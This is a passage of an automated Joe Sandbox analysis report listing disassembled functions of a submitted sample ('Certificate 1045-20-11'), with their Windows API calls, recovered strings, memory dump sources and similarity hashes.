                                                                                • Instruction Fuzzy Hash: 6D316F31100215AFEF256FA4DC49FEA3B79FF1A360F110229FA19E65A0C735D821DBA5
                                                                                Function 00886F02 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 72networkCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: _wcscpy$CleanupStartup_strcatgethostbynamegethostnameinet_ntoa
                                                                                • String ID: 0.0.0.0
                                                                                • API String ID: 2620052-3771769585
                                                                                • Opcode ID: b43c9725045692caa80f117d82e9d05a5623dc0fb7fcc38bf97a6c6ce61c6dab
                                                                                • Instruction ID: 4d4c381f928bbcb7d788c6b77d365012604a953c3b8450cbc64c326d370ff4f0
                                                                                • Opcode Fuzzy Hash: b43c9725045692caa80f117d82e9d05a5623dc0fb7fcc38bf97a6c6ce61c6dab
                                                                                • Instruction Fuzzy Hash: 4411E172904218ABCB25BB74AC0AEEA77BCFF40710F0101B5F605E6081FF74EA858B51
                                                                                Function 0086500E Relevance: 16.8, APIs: 11, Instructions: 257COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • _memset.LIBCMT ref: 00865047
                                                                                  • Part of subcall function 00867C0E: __getptd_noexit.LIBCMT ref: 00867C0E
                                                                                • __gmtime64_s.LIBCMT ref: 008650E0
                                                                                • __gmtime64_s.LIBCMT ref: 00865116
                                                                                • __gmtime64_s.LIBCMT ref: 00865133
                                                                                • __allrem.LIBCMT ref: 00865189
                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 008651A5
                                                                                • __allrem.LIBCMT ref: 008651BC
                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 008651DA
                                                                                • __allrem.LIBCMT ref: 008651F1
                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0086520F
                                                                                • __invoke_watson.LIBCMT ref: 00865280
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
                                                                                • String ID:
                                                                                • API String ID: 384356119-0
                                                                                • Opcode ID: d5e017027a87c5018ad803d53256558374d4b82fb585307daa6d96de3ac92c4c
                                                                                • Instruction ID: 1c57f6608d4148f492767a319feb3e035ccf85114160441b95614b4429f94e64
                                                                                • Opcode Fuzzy Hash: d5e017027a87c5018ad803d53256558374d4b82fb585307daa6d96de3ac92c4c
                                                                                • Instruction Fuzzy Hash: 0471D672A00F17ABDB14AE7CCC51B5AB3A8FF01764F158229F514DA781E770D9408BD1
                                                                                Function 00884DDD Relevance: 16.7, APIs: 11, Instructions: 189windowsleepCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • _memset.LIBCMT ref: 00884DF8
                                                                                • GetMenuItemInfoW.USER32(00901708,000000FF,00000000,00000030), ref: 00884E59
                                                                                • SetMenuItemInfoW.USER32(00901708,00000004,00000000,00000030), ref: 00884E8F
                                                                                • Sleep.KERNEL32(000001F4), ref: 00884EA1
                                                                                • GetMenuItemCount.USER32(?), ref: 00884EE5
                                                                                • GetMenuItemID.USER32(?,00000000), ref: 00884F01
                                                                                • GetMenuItemID.USER32(?,-00000001), ref: 00884F2B
                                                                                • GetMenuItemID.USER32(?,?), ref: 00884F70
                                                                                • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00884FB6
                                                                                • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00884FCA
                                                                                • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00884FEB
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: ItemMenu$Info$CheckCountRadioSleep_memset
                                                                                • String ID:
                                                                                • API String ID: 4176008265-0
                                                                                • Opcode ID: ea792acc36829e8cd32496d10f4d1af901d036fe4558b6951f54249168993063
                                                                                • Instruction ID: 4c82d0d504536bb21ec062c1a068caf3cc8ecdce84a8cdbc6b06ac76dea6c3b9
                                                                                • Opcode Fuzzy Hash: ea792acc36829e8cd32496d10f4d1af901d036fe4558b6951f54249168993063
                                                                                • Instruction Fuzzy Hash: 65619F7290024AAFDB21EFA8DC84EAEBBB8FB05308F14115DF941E7251DB31AD45DB21
                                                                                Function 008A9C16 Relevance: 16.7, APIs: 11, Instructions: 183windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 008A9C98
                                                                                • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 008A9C9B
                                                                                • GetWindowLongW.USER32(?,000000F0), ref: 008A9CBF
                                                                                • _memset.LIBCMT ref: 008A9CD0
                                                                                • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 008A9CE2
                                                                                • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 008A9D5A
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: MessageSend$LongWindow_memset
                                                                                • String ID:
                                                                                • API String ID: 830647256-0
                                                                                • Opcode ID: 4e126ed65f72b0345041e33e29d368f0afd3feb37de92576fabc0270520ed0aa
                                                                                • Instruction ID: 6fba8d395345c5a53283facc0f7513a6f67123d376dc0d23ab90c1ce07e80530
                                                                                • Opcode Fuzzy Hash: 4e126ed65f72b0345041e33e29d368f0afd3feb37de92576fabc0270520ed0aa
                                                                                • Instruction Fuzzy Hash: 11618A75900208AFEB10DFA8CC81EEEB7B8FB0A714F14015AFA45E7292D774A941DB50
                                                                                Function 008794E1 Relevance: 16.6, APIs: 11, Instructions: 109memoryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,00000000,?), ref: 008794FE
                                                                                • SafeArrayAllocData.OLEAUT32(?), ref: 00879549
                                                                                • VariantInit.OLEAUT32(?), ref: 0087955B
                                                                                • SafeArrayAccessData.OLEAUT32(?,?), ref: 0087957B
                                                                                • VariantCopy.OLEAUT32(?,?), ref: 008795BE
                                                                                • SafeArrayUnaccessData.OLEAUT32(?), ref: 008795D2
                                                                                • VariantClear.OLEAUT32(?), ref: 008795E7
                                                                                • SafeArrayDestroyData.OLEAUT32(?), ref: 008795F4
                                                                                • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 008795FD
                                                                                • VariantClear.OLEAUT32(?), ref: 0087960F
                                                                                • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 0087961A
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                                                • String ID:
                                                                                • API String ID: 2706829360-0
                                                                                • Opcode ID: 9785fbf300e2c499d88eea65b7649660fb1326b4e3a4726132a154bfa383e4cf
                                                                                • Instruction ID: 2c66c9544effbd88bf5dd255e7e2d8cc4faa3cee2cc867f6f5464d1f6c967676
                                                                                • Opcode Fuzzy Hash: 9785fbf300e2c499d88eea65b7649660fb1326b4e3a4726132a154bfa383e4cf
                                                                                • Instruction Fuzzy Hash: EC413D35900219EFCB05EFA8D884DDEBB79FF08355F008065E946E3251DB30EA45CBA5
                                                                                Function 0089ADAE Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 197comCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 0084936C: __swprintf.LIBCMT ref: 008493AB
                                                                                  • Part of subcall function 0084936C: __itow.LIBCMT ref: 008493DF
                                                                                • CoInitialize.OLE32 ref: 0089ADF6
                                                                                • CoUninitialize.OLE32 ref: 0089AE01
                                                                                • CoCreateInstance.OLE32(?,00000000,00000017,008CD8FC,?), ref: 0089AE61
                                                                                • IIDFromString.OLE32(?,?), ref: 0089AED4
                                                                                • VariantInit.OLEAUT32(?), ref: 0089AF6E
                                                                                • VariantClear.OLEAUT32(?), ref: 0089AFCF
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
                                                                                • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                                                • API String ID: 834269672-1287834457
                                                                                • Opcode ID: 1c9290a879e65a343f8b6fa82ba10f765bae4af47e35093fa028035e4d22acb4
                                                                                • Instruction ID: 26d562923b7be3e32f139c2091d916ed5e4c2fa3c96309b49918a7aba84613c2
                                                                                • Opcode Fuzzy Hash: 1c9290a879e65a343f8b6fa82ba10f765bae4af47e35093fa028035e4d22acb4
                                                                                • Instruction Fuzzy Hash: 62614671208715AFDB14EB54C848A6AB7E8FF88714F184819F985DB291CB70ED44CB93
                                                                                Function 00898107 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 163networkfileCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • WSAStartup.WSOCK32(00000101,?), ref: 00898168
                                                                                • inet_addr.WSOCK32(?,?,?), ref: 008981AD
                                                                                • gethostbyname.WSOCK32(?), ref: 008981B9
                                                                                • IcmpCreateFile.IPHLPAPI ref: 008981C7
                                                                                • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00898237
                                                                                • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 0089824D
                                                                                • IcmpCloseHandle.IPHLPAPI(00000000), ref: 008982C2
                                                                                • WSACleanup.WSOCK32 ref: 008982C8
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                                                                • String ID: Ping
                                                                                • API String ID: 1028309954-2246546115
                                                                                • Opcode ID: 20008970d0b40595bc2897219ef26df731eea228e751dfd1d9adaf2e10c7729b
                                                                                • Instruction ID: 8f307211a5262fa94094f86693eba8e3918ce6d1efa41fefbd315296ae348f0f
                                                                                • Opcode Fuzzy Hash: 20008970d0b40595bc2897219ef26df731eea228e751dfd1d9adaf2e10c7729b
                                                                                • Instruction Fuzzy Hash: BA516F31604705DFDB20AF64CD45B2AB7E4FF4A710F18892AFA56DB2A1DB70E905CB42
                                                                                Function 008A9E43 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 105windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • _memset.LIBCMT ref: 008A9E5B
                                                                                • CreateMenu.USER32 ref: 008A9E76
                                                                                • SetMenu.USER32(?,00000000), ref: 008A9E85
                                                                                • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 008A9F12
                                                                                • IsMenu.USER32(?), ref: 008A9F28
                                                                                • CreatePopupMenu.USER32 ref: 008A9F32
                                                                                • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 008A9F63
                                                                                • DrawMenuBar.USER32 ref: 008A9F71
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
                                                                                • String ID: 0
                                                                                • API String ID: 176399719-4108050209
                                                                                • Opcode ID: 26c75edd08ebc3f81092678dd7938ea238a9cf5cd8d8b9124ecefd68f1e81462
                                                                                • Instruction ID: 959495803400d833b603896bea627b3efdceed29a01c15cad01f6e5c3b754843
                                                                                • Opcode Fuzzy Hash: 26c75edd08ebc3f81092678dd7938ea238a9cf5cd8d8b9124ecefd68f1e81462
                                                                                • Instruction Fuzzy Hash: B2415875A04209AFEB10DF64D884FAABBB5FF49314F154129F985E7361DB31A910CF90
                                                                                Function 0088E389 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 97COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • SetErrorMode.KERNEL32(00000001), ref: 0088E396
                                                                                • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 0088E40C
                                                                                • GetLastError.KERNEL32 ref: 0088E416
                                                                                • SetErrorMode.KERNEL32(00000000,READY), ref: 0088E483
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: Error$Mode$DiskFreeLastSpace
                                                                                • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                                                • API String ID: 4194297153-14809454
                                                                                • Opcode ID: 50154ef6340075152ca4bfc0f07009c12b0da90942a2070b40c07bacdc802dd6
                                                                                • Instruction ID: f9bfc99534e996f6c7b39418e6d5b8456ff06d89af2187211cc734601fa90cd4
                                                                                • Opcode Fuzzy Hash: 50154ef6340075152ca4bfc0f07009c12b0da90942a2070b40c07bacdc802dd6
                                                                                • Instruction Fuzzy Hash: 2C317235A0060D9FDB01FF68C845EBEBBB4FF45304F148025E619EB291EB74AA01C795
                                                                                Function 0087B907 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 81windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 0087B98C
                                                                                • GetDlgCtrlID.USER32 ref: 0087B997
                                                                                • GetParent.USER32 ref: 0087B9B3
                                                                                • SendMessageW.USER32(00000000,?,00000111,?), ref: 0087B9B6
                                                                                • GetDlgCtrlID.USER32(?), ref: 0087B9BF
                                                                                • GetParent.USER32(?), ref: 0087B9DB
                                                                                • SendMessageW.USER32(00000000,?,?,00000111), ref: 0087B9DE
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: MessageSend$CtrlParent
                                                                                • String ID: ComboBox$ListBox
                                                                                • API String ID: 1383977212-1403004172
                                                                                • Opcode ID: b81a1ee4373136051876313dd0d09dddd1ea221027709256f0e3f79c75679c3d
                                                                                • Instruction ID: c8fe0d6d7e954d42a6de24ccd3ed31eb932ff2cb7cd2a0ece4c61041810ccb10
                                                                                • Opcode Fuzzy Hash: b81a1ee4373136051876313dd0d09dddd1ea221027709256f0e3f79c75679c3d
                                                                                • Instruction Fuzzy Hash: B921C475900208AFCB04ABA4CC85FBEBB79FF55310B104115FA65D72A5DB749815DB60
                                                                                Function 0087B9F0 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 80windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • SendMessageW.USER32(?,00000186,00000002,00000000), ref: 0087BA73
                                                                                • GetDlgCtrlID.USER32 ref: 0087BA7E
                                                                                • GetParent.USER32 ref: 0087BA9A
                                                                                • SendMessageW.USER32(00000000,?,00000111,?), ref: 0087BA9D
                                                                                • GetDlgCtrlID.USER32(?), ref: 0087BAA6
                                                                                • GetParent.USER32(?), ref: 0087BAC2
                                                                                • SendMessageW.USER32(00000000,?,?,00000111), ref: 0087BAC5
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: MessageSend$CtrlParent
                                                                                • String ID: ComboBox$ListBox
                                                                                • API String ID: 1383977212-1403004172
                                                                                • Opcode ID: b8ff25d0d5cb6a4971fb5c18321c8e55a3cc5e341fbf77d8db2680211be316e6
                                                                                • Instruction ID: 0ee542ac158a7ded70f6d6b8c2f6ca5c84dba50c78ddde3612c39ed71b82567c
                                                                                • Opcode Fuzzy Hash: b8ff25d0d5cb6a4971fb5c18321c8e55a3cc5e341fbf77d8db2680211be316e6
                                                                                • Instruction Fuzzy Hash: 2F21CFB4A01208BFDB00ABA4CC85EBEBB79FF45304F004015F955E72A5DB79881ADB60
                                                                                Function 0087BAD7 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 71windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetParent.USER32 ref: 0087BAE3
                                                                                • GetClassNameW.USER32(00000000,?,00000100), ref: 0087BAF8
                                                                                • _wcscmp.LIBCMT ref: 0087BB0A
                                                                                • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 0087BB85
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: ClassMessageNameParentSend_wcscmp
                                                                                • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                                                • API String ID: 1704125052-3381328864
                                                                                • Opcode ID: e139ad1e11b3ed03f74bbba933d87abde5b2af1297f97a898ed0f3fbf96546a2
                                                                                • Instruction ID: fa08edea32d2e8bd05ef6dc4b8a203955a699c9f40ff0f4139b7562c1accc8dc
                                                                                • Opcode Fuzzy Hash: e139ad1e11b3ed03f74bbba933d87abde5b2af1297f97a898ed0f3fbf96546a2
                                                                                • Instruction Fuzzy Hash: E311E77664831AFAFA2066349C06EA6779EFF21334B204022FE19E50DDEF65E8114654
                                                                                Function 0089B2A9 Relevance: 15.3, APIs: 10, Instructions: 324fileCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • VariantInit.OLEAUT32(?), ref: 0089B2D5
                                                                                • CoInitialize.OLE32(00000000), ref: 0089B302
                                                                                • CoUninitialize.OLE32 ref: 0089B30C
                                                                                • GetRunningObjectTable.OLE32(00000000,?), ref: 0089B40C
                                                                                • SetErrorMode.KERNEL32(00000001,00000029), ref: 0089B539
                                                                                • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002), ref: 0089B56D
                                                                                • CoGetObject.OLE32(?,00000000,008CD91C,?), ref: 0089B590
                                                                                • SetErrorMode.KERNEL32(00000000), ref: 0089B5A3
                                                                                • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 0089B623
                                                                                • VariantClear.OLEAUT32(008CD91C), ref: 0089B633
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
                                                                                • String ID:
                                                                                • API String ID: 2395222682-0
                                                                                • Opcode ID: 949dd5541abf6671fe48c4afd3c172b776bd8b528c9ab1d7683d4abf324efeda
                                                                                • Instruction ID: fead13709c67787ac28746f88108d73d820ff9d76638022b6e231571505c9069
                                                                                • Opcode Fuzzy Hash: 949dd5541abf6671fe48c4afd3c172b776bd8b528c9ab1d7683d4abf324efeda
                                                                                • Instruction Fuzzy Hash: 30C1F271608305AFDB00EF68D98492ABBE9FF88708F04496DF58ADB251DB71ED05CB52
                                                                                Function 008867E9 Relevance: 15.1, APIs: 10, Instructions: 107windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • __swprintf.LIBCMT ref: 008867FD
                                                                                • __swprintf.LIBCMT ref: 0088680A
                                                                                  • Part of subcall function 0086172B: __woutput_l.LIBCMT ref: 00861784
                                                                                • FindResourceW.KERNEL32(?,?,0000000E), ref: 00886834
                                                                                • LoadResource.KERNEL32(?,00000000), ref: 00886840
                                                                                • LockResource.KERNEL32(00000000), ref: 0088684D
                                                                                • FindResourceW.KERNEL32(?,?,00000003), ref: 0088686D
                                                                                • LoadResource.KERNEL32(?,00000000), ref: 0088687F
                                                                                • SizeofResource.KERNEL32(?,00000000), ref: 0088688E
                                                                                • LockResource.KERNEL32(?), ref: 0088689A
                                                                                • CreateIconFromResourceEx.USER32(?,?,00000001,00030000,00000000,00000000,00000000), ref: 008868F9
                                                                                Memory Dump Source
